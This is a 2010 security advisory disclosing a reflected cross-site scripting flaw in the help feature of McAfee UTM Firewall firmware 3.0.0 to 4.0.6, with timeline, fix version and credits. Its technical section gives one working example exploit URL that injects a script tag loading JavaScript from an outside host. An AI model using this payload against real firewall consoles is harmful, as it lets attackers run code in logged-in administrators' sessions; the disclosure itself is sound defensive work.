McAfee UTM Firewall Help Cross-Site Scripting
Advisory Information
Advisory ID: NGENUITY-2010-005
Date published: June 9, 2010
Vulnerability Information
Class: Cross-Site Scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: No
BID: 40708
Software Description
McAfee UTM Firewall (formerly SnapGear) is the affected product line. More information can be found at http://www.mcafee.com/us/enterprise/products/network_security/utm_firewall.html
Vulnerability Description
The help feature of the McAfee UTM Firewall (Firmware 3.0.0 to 4.0.6) management console is vulnerable to reflected cross-site scripting.
It could allow an attacker to cause a user to execute attacker-supplied Javascript code. This attack requires the target to have an existing valid session logged into the UTM device and that the attacker know the internal IP address for the UTM device.
McAfee recommends upgrading to UTM Firewall Firmware 4.0.7 to mitigate this vulnerability.
Timeline:
1/21/2010 - McAfee notified of vulnerability, provided with proof of concept
6/9/2010 - McAfee notified nGenuity of available fix and related information
Technical Description
Example Exploit URL:
http://192.168.0.1/cgi-bin/cgix/help?&page=web_list_block“><script src=“http://example.com/xss.js”></script>
References
Credits
This vulnerability was discovered by Adam Baldwin
Disclaimer
The contents of this advisory are copyright (c) nGenuity Information Security and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.